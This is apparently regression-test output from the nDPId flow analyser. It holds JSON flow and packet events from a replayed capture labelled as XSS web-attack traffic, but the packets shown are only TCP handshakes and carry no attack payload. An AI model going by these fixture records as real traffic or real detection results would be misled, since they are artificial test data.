+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347132137,"flow_last_seen":1499347132137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347132137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1499347132137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pedAAD4GH+msEAABwKgKMtK6AFAZEC1iAAAAAKACchC7yAAAAgQFtAQCCAoBOYiFAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1499347132137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0rps\/2\/vGRAtY6AScSCB2QAAAgQFtAQCCAoD41n8ATmIhQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1499347132138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347132138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pehAAD4GH\/CsEAABwKgKMtK6AFAZEC1jbP9v8IAQAOUg4QAAAQEICgE5iIUD41n8"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347133434,"flow_last_seen":1499347133434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347133434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1499347133434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Et1AAD4GsvOsEAABwKgKMtLIAFBRGZsUAAAAAKACchAUuwAAAgQFtAQCCAoBOYnJAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1499347133434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0sgnZz2uURmbFaAScSBRYQAAAgQFtAQCCAoD41tAATmJyQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1499347133435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347133435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Et5AAD4GsvqsEAABwKgKMtLIAFBRGZsVJ2c9r4AQAOXwaAAAAQEICgE5ickD41tA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347134702,"flow_last_seen":1499347134702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347134702,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1499347134702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wYFAAD4GBE+sEAABwKgKMtLWAFCOukqHAAAAAKACchAmXAAAAgQFtAQCCAoBOYsGAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1499347134702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0tYST2RqjrpKiKAScSBQIQAAAgQFtAQCCAoD41x9ATmLBgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1499347134703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347134703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wYJAAD4GBFasEAABwKgKMtLWAFCOukqIEk9ka4AQAOXvKAAAAQEICgE5iwYD41x9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347137239,"flow_last_seen":1499347137239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347137239,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1499347137239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iNFAAD4GPP+sEAABwKgKMtLwAFB7ggVRAAAAAKACchB8NgAAAgQFtAQCCAoBOY2AAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1499347137239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0vDqtMDQe4IFUqAScSButQAAAgQFtAQCCAoD4173ATmNgAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1499347137240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347137240,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iNJAAD4GPQasEAABwKgKMtLwAFB7ggVS6rTA0YAQAOUNvAAAAQEICgE5jYED4173"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347138552,"flow_last_seen":1499347138552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347138552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1499347138552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8erdAAD4GSxmsEAABwKgKMtL+AFByz\/R+AAAAAKACchCUZAAAAgQFtAQCCAoBOY7JAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1499347138552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0v61vhLmcs\/0f6AScSBofAAAAgQFtAQCCAoD42A\/ATmOyQEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1499347138553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347138553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0erhAAD4GSyCsEAABwKgKMtL+AFByz\/R\/tb4S54AQAOUHhAAAAQEICgE5jskD42A\/"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347141111,"flow_last_seen":1499347141111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347141111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1499347141111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OEpAAD4GjYasEAABwKgKMtMYAFBIRqkCAAAAAKACchAH0QAAAgQFtAQCCAoBOZFIAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1499347141111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0xgJZZF8SEapA6AScSAHLAAAAgQFtAQCCAoD42K\/ATmRSAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1499347141112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347141112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OEtAAD4GjY2sEAABwKgKMtMYAFBIRqkDCWWRfYAQAOWmMgAAAQEICgE5kUkD42K\/"} 